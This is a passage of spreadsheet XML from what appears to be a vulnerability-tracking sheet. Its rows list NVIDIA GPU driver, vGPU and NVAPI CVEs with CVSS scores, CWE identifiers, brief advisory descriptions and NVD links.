      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where a user could cause type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47572</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47573</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>NVIDIA NVAPI for Windows contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47573</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47574</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>NVIDIA vGPU Virtual GPU Manager for Linux contains a vulnerability where an attacker could cause incorrect resource transfer between spheres. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47574</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47575</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the display driver DIAG escape handler where a local unprivileged attacker may cause an integer overflow and out-of-bounds write. A successful exploit of this vulnerability might lead to denial of service, and code execution.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47575</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47577</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an incorrect comparison. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47577</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47578</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an attacker could cause an incorrect buffer size calculation. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47578</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47579</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>The NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode driver through which a user might trigger a use-after-free condition. Successful exploitation of this issue could lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47579</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47583</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause type confusion. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47583</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47585</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module where an attacker could cause an integer underflow. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47585</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47587</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47587</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47588</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where an unprivileged user could cause a use-after-free condition by issuing a sequence of driver commands. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47588</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47589</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S197"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and information disclosure.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47589</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47590</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S198"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and information disclosure.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47590</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47591</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could bypass read-only memory protection due to incorrect authorization, enabling write access to memory marked read-only. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47591</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47592</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47592</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47593</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an unprivileged user can cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, and denial of service.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47593</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47594</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S202"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data tampering, and information disclosure.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47594</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47595</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
